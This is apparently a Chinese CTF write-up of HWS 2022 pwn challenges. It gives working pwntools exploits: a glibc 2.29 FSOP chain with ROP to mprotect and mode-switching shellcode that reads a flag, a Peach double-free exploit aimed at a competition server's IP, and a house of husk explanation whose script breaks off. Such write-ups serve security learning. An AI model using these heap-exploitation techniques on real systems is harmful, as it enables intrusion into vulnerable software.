<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">"./grape"</span>,env=&#123;<span class="string">"LD_PRELOAD"</span>:<span class="string">"./libc/libc-2.29.so"</span>&#125;)</span><br><span class="line"><span class="comment">#sh = process("./grape")</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">context.terminal = [<span class="string">'tmux'</span>, <span class="string">'splitw'</span>, <span class="string">'-h'</span>]</span><br><span class="line">large = <span class="string">b'big'</span></span><br><span class="line">small = <span class="string">b'medium'</span></span><br><span class="line">fast = <span class="string">b'small'</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(idx,scale,content)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">b"choice &gt;&gt;&gt; "</span>,<span class="string">b'1'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">b'wanner plant:\n'</span>,str(idx).encode(<span class="string">'utf8'</span>))</span><br><span class="line">    sh.sendlineafter(<span class="string">b'/ big one?\n'</span>,scale)</span><br><span class="line">    sh.sendafter(<span class="string">b' your grape tree:\n'</span>,content)</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span><span class="params">(idx)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">b"choice &gt;&gt;&gt; "</span>,<span class="string">b'2'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">b"idx of your tree:\n"</span>,str(idx).encode(<span class="string">'utf8'</span>))</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span><span class="params">(idx)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">b"choice &gt;&gt;&gt; "</span>,<span class="string">b'3'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">b"idx of your tree:\n"</span>,str(idx).encode(<span class="string">'utf8'</span>))</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">backdoor</span><span class="params">(addr,value)</span>:</span></span><br><span class="line">    sh.sendlineafter(<span class="string">b"choice &gt;&gt;&gt; "</span>,<span class="string">b'666'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">b"present(s) now!\n"</span>,<span class="string">'yes'</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">b'lucky number:\n'</span>,str(addr).encode(<span class="string">'utf8'</span>))</span><br><span class="line">    sh.sendafter(<span class="string">b"your present:\n"</span>,p64(value))</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line"> </span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">12</span>):</span><br><span class="line">    add(i,large,<span class="string">'nothing'</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">7</span>):</span><br><span class="line">    dele(i)</span><br><span class="line">    </span><br><span class="line"><span class="comment">#修改key</span></span><br><span class="line"></span><br><span class="line">backdoor(<span class="number">0x218</span>,<span class="number">0xdeadbeff</span>)</span><br><span class="line">backdoor(<span class="number">0x628</span>,<span class="number">0xdeadbeff</span>)</span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">show(<span class="number">0</span>)</span><br><span class="line">libc_base = u64(sh.recvuntil(<span class="string">b'\x7f'</span>)[<span class="number">-6</span>:].ljust(<span class="number">8</span>,<span class="string">b'\x00'</span>)) - <span class="number">0x1e4ca0</span></span><br><span class="line">success(hex(libc_base))</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">heap_base = u64(sh.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b'\x00'</span>)) - <span class="number">0x10</span></span><br><span class="line">success(hex(heap_base))</span><br><span class="line"></span><br><span class="line">dele(<span class="number">7</span>)</span><br><span class="line">libc = ELF(<span class="string">'./libc/libc-2.29.so'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">victim = heap_base + <span class="number">0x1c90</span></span><br><span class="line">vtable_after = victim + <span class="number">0xe0</span></span><br><span class="line">wide_data_after = vtable_after + <span class="number">0x28</span></span><br><span class="line">wfile_vtable = <span class="number">0x1e6020</span> + libc_base</span><br><span class="line">getkeyserv_handle = libc_base + <span class="number">0x150550</span></span><br><span class="line">setcontext = libc_base + <span class="number">0x55e35</span></span><br><span class="line">mprotect = libc_base + <span class="number">0x117590</span></span><br><span class="line">read = libc_base + libc.sym[<span class="string">'read'</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">poprdi = libc_base + <span class="number">0x0000000000026542</span></span><br><span class="line">poprsi = libc_base + <span class="number">0x0000000000026f9e</span></span><br><span class="line">poprdx = libc_base + <span class="number">0x000000000012bda6</span></span><br><span class="line">payload = p64(<span class="number">0xdeadbeef</span>) * <span class="number">0x2</span></span><br><span class="line">payload += p64(<span class="number">0xdeadbeef</span>) * <span class="number">0xe</span></span><br><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">5</span></span><br><span class="line">payload += p64(wide_data_after) <span class="comment"># codecvt</span></span><br><span class="line">payload += p64(vtable_after) <span class="comment"># _wide_data</span></span><br><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">6</span></span><br><span class="line">payload += p64(wfile_vtable+<span class="number">0x48</span>) <span class="comment">#vtable</span></span><br><span class="line">payload += p64(<span class="number">1</span>) <span class="comment"># wide_data :: read_ptr</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment"># wide_data :: read_end</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment"># wide_data :: read_base</span></span><br><span class="line">payload += p64(<span class="number">1</span>) <span class="comment"># wide_data :: write_base</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment"># wide_data :: write_ptr</span></span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(wide_data_after+<span class="number">0x10</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">2</span></span><br><span class="line">payload += p64(getkeyserv_handle)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(setcontext)</span><br><span class="line">payload += p64(<span class="number">0</span>) * <span class="number">8</span></span><br><span class="line">payload += p64(libc_base) <span class="comment"># rdi</span></span><br><span class="line">payload += p64(<span class="number">0x3000</span>) <span class="comment"># rsi</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment"># rbp</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment"># rbx</span></span><br><span class="line">payload += p64(<span class="number">7</span>) <span class="comment"># rdx</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment">#</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment"># rcx</span></span><br><span class="line">payload += p64(wide_data_after+<span class="number">0xc0</span>) <span class="comment"># rsp</span></span><br><span class="line">payload += p64(mprotect) <span class="comment"># restore rip</span></span><br><span class="line">payload += p64(poprdi)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(poprsi)</span><br><span class="line">payload += p64(libc_base)</span><br><span class="line">payload += p64(poprdx)</span><br><span class="line">payload += p64(<span class="number">0x300</span>)</span><br><span class="line">payload += p64(read)</span><br><span class="line">payload += p64(libc_base)</span><br><span class="line"></span><br><span class="line"><span class="comment">#orw payload</span></span><br><span class="line">add(<span class="number">12</span>,large,payload)</span><br><span class="line">dele(<span class="number">12</span>)</span><br><span class="line"></span><br><span class="line">dele(<span class="number">8</span>)</span><br><span class="line">add(<span class="number">13</span>,fast,<span class="string">'for split'</span>)</span><br><span class="line">dele(<span class="number">10</span>)</span><br><span class="line">io_list_all = libc_base + <span class="number">0x1e5660</span></span><br><span class="line">backdoor(<span class="number">0x228</span>,io_list_all<span class="number">-0x20</span>)</span><br><span class="line">gdb.attach(sh,<span class="string">'b *$rebase(0x15d7)\n'</span>)</span><br><span class="line">add(<span class="number">14</span>,large,<span class="string">'exploit'</span>)</span><br><span class="line"></span><br><span class="line">sh.sendlineafter(<span class="string">b"choice &gt;&gt;&gt; "</span>,<span class="string">b'999'</span>)</span><br><span class="line">success(<span class="string">"heap addr : "</span>+hex(heap_base))</span><br><span class="line">shellcode = shellcraft.amd64.linux.mmap(<span class="number">0x410000</span>,<span class="number">0x1000</span>,<span class="number">7</span>,<span class="number">0x32</span>,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">shellcode += shellcraft.amd64.linux.read(<span class="number">0</span>,<span class="number">0x410000</span>,<span class="number">0x1000</span>)</span><br><span class="line">shellcode += <span class="string">'''</span></span><br><span class="line"><span class="string">    mov rsp,0x410f00</span></span><br><span class="line"><span class="string">    mov dword ptr [rsp+4],0x23</span></span><br><span class="line"><span class="string">    mov dword ptr [rsp],0x410000</span></span><br><span class="line"><span class="string">    retf</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">sh.sendafter(<span class="string">"grapes~Bye!\n"</span>,asm(shellcode,arch=<span class="string">'amd64'</span>))</span><br><span class="line">sleep(<span class="number">5</span>)</span><br><span class="line">shellcode = shellcraft.i386.linux.open(<span class="string">'./flag'</span>)</span><br><span class="line">shellcode += <span class="string">'''</span></span><br><span class="line"><span class="string">    mov dword ptr [esp+4],0x33</span></span><br><span class="line"><span class="string">    mov dword ptr [esp],0x410100</span></span><br><span class="line"><span class="string">    retf</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">shellcode1 = shellcraft.amd64.linux.read(<span class="number">3</span>,<span class="number">0x410300</span>,<span class="number">0x100</span>) + shellcraft.amd64.linux.write(<span class="number">1</span>,<span class="number">0x410300</span>,<span class="number">0x50</span>)</span><br><span class="line">shellcode = asm(shellcode,arch=<span class="string">'i386'</span>).ljust(<span class="number">0x100</span>,<span class="string">b'\x90'</span>)</span><br><span class="line">shellcode1 = asm(shellcode1,arch=<span class="string">'amd64'</span>)</span><br><span class="line">sh.send(shellcode + shellcode1)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
<h3 id="Refs"><a href="#Refs" class="headerlink" title="Refs"></a>Refs</h3><p><a href="https://darkeyer.github.io/2020/08/17/FSOP在glibc2.29中的利用/" target="_blank" rel="noopener">Glibc 2.29下的IO_FILE利用 - Mr.R的博客 | By Blog (darkeyer.github.io)</a></p>
<p><a href="https://bbs.pediy.com/thread-271301.htm#msg_header_h1_2" target="_blank" rel="noopener">[原创]HWS 2022线上预选赛pwn writeup-CTF对抗-看雪论坛-安全社区|安全招聘|bbs.pediy.com</a></p>
<h2 id="Peach"><a href="#Peach" class="headerlink" title="Peach"></a>Peach</h2><p><img src="/2022/02/13/HWS2022/image-20220212160643571.png" alt="image-20220212160643571"></p>
<p>指定了解释器为2.26，直接运行就运行不起来，需要用pwndocker搞个环境</p>
<p><a href="https://github.com/skysider/pwndocker" target="_blank" rel="noopener">skysider/pwndocker: A docker environment for pwn in ctf (github.com)</a></p>
<p><img src="/2022/02/13/HWS2022/image-20220212161515691.png" alt="image-20220212161515691"></p>
<p>按pwndocker文档里面给的方法，因为程序已经修改好了interpreter路径了，所以直接用LD_PRELOAD指向libc即可(注意绝对路径)</p>
<p><img src="/2022/02/13/HWS2022/image-20220212161758290.png" alt="image-20220212161758290"></p>
<p><img src="/2022/02/13/HWS2022/image-20220212160741394.png" alt="image-20220212160741394"></p>
<p>开局会把flag读入到栈上，并且打印整个栈地址(202060里面存放是栈地址 flag_buf[96])然后进入菜单，</p>
<p><img src="/2022/02/13/HWS2022/image-20220212184057301.png" alt="image-20220212184057301"></p>
<p>这题漏洞是在draw得时候存在两个漏洞，一个是index有负数溢出，第二个是存在堆溢出，这题用不到堆溢出</p>
<p><img src="/2022/02/13/HWS2022/image-20220212184216394.png" alt="image-20220212184216394"></p>
<p>利用思路思路为程序的argv是在栈上的，0x202060里的地址是&amp;flag_buf[96],我们可以利用负数溢出修改0x202060的地址为argv的地址，然后read修改argv里面的指针为flag的地址，再通过malloc_printerr打印出flag</p>
<p><img src="/2022/02/13/HWS2022/image-20220212194417584.png" alt="image-20220212194417584"></p>
<p><img src="/2022/02/13/HWS2022/image-20220212185538528.png" alt="image-20220212185538528"></p>
<p>在程序开始read时，输入1D个字符，这样能写个换行符上去，因为flag得读入位置是在这次输入字符串上面的，后面打印flag的时候就能打印到换行符</p>
<p><img src="/2022/02/13/HWS2022/image-20220212185456433.png" alt="image-20220212185456433"></p>
<p>这里draw -36按地址算，就是0x202060</p>
<p><img src="/2022/02/13/HWS2022/image-20220212194459079.png" alt="image-20220212194459079"></p>
<p>申请三个chunk</p>
<p><img src="/2022/02/13/HWS2022/image-20220212194531214.png" alt="image-20220212194531214"></p>
<p><img src="/2022/02/13/HWS2022/image-20220212194554999.png" alt="image-20220212194554999"></p>
<p>第一次throw chunk0，0x20会进入tcache(2.26引入的tcache)，然后0x410会进入unsortedbin，同时56180处会被清空</p>
<p><img src="/2022/02/13/HWS2022/image-20220212194603198.png" alt="image-20220212194603198"></p>
<p>Add_err会重新把0x20分配过来，同时覆盖掉其中data_ptr为chunk1的data_ptr（原先并没有清空），之后因为传的size是001，所以直接走入了else流程，只是又把0x20的chunk free了，没有清空，这样其内部的data_ptr已经是chunk1的data_ptr了</p>
<p><img src="/2022/02/13/HWS2022/image-20220212194821519.png" alt="image-20220212194821519"></p>
<p>最后 连着两个free触发double free</p>
<p>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">from</span> re <span class="keyword">import</span> I, L</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(os=<span class="string">'linux'</span>,arch=<span class="string">'amd64'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">libc = ELF(<span class="string">'./libc/libc-2.26.so'</span>)</span><br><span class="line">elf = ELF(<span class="string">"./peachw"</span>)</span><br><span class="line">i = <span class="number">0</span></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    local = <span class="number">0</span></span><br><span class="line">    <span class="keyword">if</span> local:</span><br><span class="line">        p = process([<span class="string">"./libc/ld-2.26.so"</span>, <span class="string">"./peachw"</span>],</span><br><span class="line">            env=&#123;<span class="string">"LD_PRELOAD"</span>:<span class="string">"./libc/libc-2.26.so"</span>&#125;)</span><br><span class="line">        <span class="comment"># p = process(["/home/sjj/glibc-all-in-one/2.26-0ubuntu2.1_amd64/ld-2.26.so", "./peachw"],</span></span><br><span class="line">        <span class="comment">#         env=&#123;"LD_PRELOAD":"/home/sjj/glibc-all-in-one/2.26-0ubuntu2.1_amd64/libc-2.26.so"&#125;)</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p = remote(<span class="string">"1.13.162.249"</span>,<span class="string">"10003"</span>)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">log</span><span class="params">(addr)</span>:</span></span><br><span class="line">        print(<span class="string">"[*]==&gt;"</span>+hex(addr))</span><br><span class="line"></span><br><span class="line">    p.sendlineafter(<span class="string">"Do you like peach?"</span>,<span class="string">"yes\x00"</span>+<span class="string">"a"</span>*(<span class="number">0x1d</span><span class="number">-5</span>))</span><br><span class="line">    p.recvuntil(<span class="string">"The peach is "</span>)</span><br><span class="line">    flag_addr = int(p.recvline()[:<span class="number">-1</span>])</span><br><span class="line"></span><br><span class="line">    flag_addr -= <span class="number">96</span></span><br><span class="line">    log(flag_addr)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">cmd</span><span class="params">(i)</span>:</span></span><br><span class="line">        p.sendafter(<span class="string">"Your choice:"</span>,p8(i))</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(idx,name,size,data)</span>:</span></span><br><span class="line">        cmd(<span class="number">1</span>)</span><br><span class="line">        p.sendlineafter(<span class="string">"Index ?"</span>,str(idx))</span><br><span class="line">        p.sendlineafter(<span class="string">"name your peach  :"</span>,name)</span><br><span class="line">        p.sendlineafter(<span class="string">"size of your peach:"</span>,str(size))</span><br><span class="line">        p.sendafter(<span class="string">"please descripe your peach :"</span>,data)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(idx,name,size,data)</span>:</span></span><br><span class="line">        cmd(<span class="number">1</span>)</span><br><span class="line">        p.sendlineafter(<span class="string">"Index ?"</span>,str(idx))</span><br><span class="line">        p.sendlineafter(<span class="string">"name your peach  :"</span>,name)</span><br><span class="line">        p.sendlineafter(<span class="string">"size of your peach:"</span>,str(size))</span><br><span class="line">        p.sendafter(<span class="string">"please descripe your peach :"</span>,data)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">add_err</span><span class="params">(idx,name,size)</span>:</span></span><br><span class="line">        cmd(<span class="number">1</span>)</span><br><span class="line">        p.sendlineafter(<span class="string">"Index ?"</span>,str(idx))</span><br><span class="line">        p.sendafter(<span class="string">"name your peach  :"</span>,name)</span><br><span class="line">        p.sendlineafter(<span class="string">"size of your peach:"</span>,str(size))</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">throw</span><span class="params">(idx)</span>:</span></span><br><span class="line">        cmd(<span class="number">2</span>)</span><br><span class="line">        p.recvuntil(<span class="string">'Index ?'</span>)</span><br><span class="line">        p.sendline(str(idx))</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">eat</span><span class="params">(idx,num)</span>:</span></span><br><span class="line">        cmd(<span class="number">3</span>)</span><br><span class="line">        p.recvuntil(<span class="string">'Index ?'</span>)</span><br><span class="line">        p.sendline(str(idx))</span><br><span class="line">        <span class="comment"># gdb.attach(p)</span></span><br><span class="line">        p.sendafter(<span class="string">"What's your lucky number?"</span>,str(num))</span><br><span class="line">        <span class="keyword">print</span> p.recv()</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">draw</span><span class="params">(idx,data)</span>:</span></span><br><span class="line">        cmd(<span class="number">4</span>)</span><br><span class="line">        p.recvuntil(<span class="string">'Index ?'</span>)</span><br><span class="line">        p.send(str(idx))</span><br><span class="line">        p.sendafter(<span class="string">"input the new size of your peach"</span>,<span class="string">'\x00\x03'</span>)</span><br><span class="line">        p.sendafter(<span class="string">"start to draw your peach \n"</span>,data)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    draw(<span class="number">-36</span>,<span class="string">"\x00"</span>*(<span class="number">0x190</span>+i*<span class="number">8</span>)+p16(flag_addr))</span><br><span class="line"></span><br><span class="line">    add(<span class="number">0</span>,<span class="string">"aaa"</span>,<span class="number">0x410</span>,<span class="string">"bbb"</span>)</span><br><span class="line">    add(<span class="number">1</span>,<span class="string">"aaa"</span>,<span class="number">0x410</span>,<span class="string">"bbb"</span>)</span><br><span class="line">    add(<span class="number">2</span>,<span class="string">"aaa"</span>,<span class="number">0x410</span>,<span class="string">"bbb"</span>)</span><br><span class="line">    throw(<span class="number">0</span>)</span><br><span class="line">    add_err(<span class="number">0</span>,<span class="string">"a"</span>*<span class="number">0x10</span>+p16(<span class="number">0xf6e0</span>),<span class="number">0x001</span>)</span><br><span class="line">    throw(<span class="number">1</span>)</span><br><span class="line">    throw(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        p.recvuntil(<span class="string">"*** Error in "</span>)</span><br><span class="line">        flag = p.recvuntil(<span class="string">"invalid"</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">"&#123;"</span> <span class="keyword">in</span> flag:</span><br><span class="line">            <span class="keyword">print</span> flag</span><br><span class="line">            pause()</span><br><span class="line">        <span class="keyword">elif</span> <span class="string">"free()"</span> <span class="keyword">in</span> flag :</span><br><span class="line">            i= i + <span class="number">1</span></span><br><span class="line">            <span class="keyword">print</span> i</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            pause()</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">    p.close()</span><br><span class="line"></span><br><span class="line"><span class="comment"># flag&#123;G0od job~~~This is the real peach you get~&#125;</span></span><br></pre></td></tr></table></figure>
<h2 id="送分题"><a href="#送分题" class="headerlink" title="送分题"></a>送分题</h2><p>程序逻辑比较裸，就不仔细分析了</p>
<p><img src="/2022/02/13/HWS2022/image-20220212153527020.png" alt="image-20220212153527020"></p>
<p>这里泄露了libc基地址</p>
<p><img src="/2022/02/13/HWS2022/image-20220212153545347.png" alt="image-20220212153545347"></p>
<p>然后可以read破坏chunk的bk，进行一次unsortedbin attack的能力</p>
<p>实际上整个题就是一个裸的house of husk</p>
<p>其原理就是printf在打印格式化字符串时，可以为格式化符注册处理函数，并且libc中有一张表以ASCII码作为下标，存储着对应的处理函数指针，因此我们首先利用UAF等手段修改global_max_fast为main_arena+88,之后释放合适的size大小的块，使得__printf_arginfo_table表的指针被修改成堆块的地址，然后我们就可以伪造这张表的内容，修改%s等格式符的回调函数为one_gadget</p>
<p>实际上如果不是这题就是裸house of husk，在我们能够用fastbin覆写main_arena后面的内容，我们完全可以选择_free_hook这样更简单的目标</p>
<p><a href="https://juejin.cn/post/6844904117119385614" target="_blank" rel="noopener">house-of-husk学习笔记 - 掘金 (juejin.cn)</a></p>
<p><a href="https://ptr-yudai.hatenablog.com/entry/2020/04/02/111507" target="_blank" rel="noopener">House of Husk - CTFするぞ (hatenablog.com)</a></p>
<p><a href="https://www.anquanke.com/post/id/202387" target="_blank" rel="noopener">house-of-husk学习笔记 - 安全客，安全资讯平台 (anquanke.com)</a></p>
<p>libc中关键符号地址的寻找方法(实在找不到就用debug版本去找)</p>
<p>max_fast,暂时想到是用free函数去找</p>
<p><img src="/2022/02/13/HWS2022/image-20220212155259739.png" alt="image-20220212155259739"></p>
<p>main_arena老生常谈就是在malloc_hook上面</p>
<p><img src="/2022/02/13/HWS2022/image-20220212155341654.png" alt="image-20220212155341654"></p>
<p>两个printf的函数表，用register_printf_specifier函数去找</p>
<p><img src="/2022/02/13/HWS2022/image-20220212155414061.png" alt="image-20220212155414061"></p>
<p>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> struct <span class="keyword">import</span> pack, unpack</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line">p = process(<span class="string">"./pwn"</span>)</span><br><span class="line">libc_path = <span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span></span><br><span class="line">libc = ELF(libc_path)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">MAIN_ARENA = <span class="number">0x3ebc40</span></span><br><span class="line">MAIN_ARENA_DELTA = <span class="number">0x60</span></span><br><span class="line">GLOBAL_MAX_FAST = <span class="number">0x3ed940</span></span><br><span class="line">PRINTF_FUNCTABLE = <span class="number">0x3F0738</span></span><br><span class="line">PRINTF_ARGINFO = <span class="number">0x3ec870</span></span><br><span class="line">ONE_GADGET = 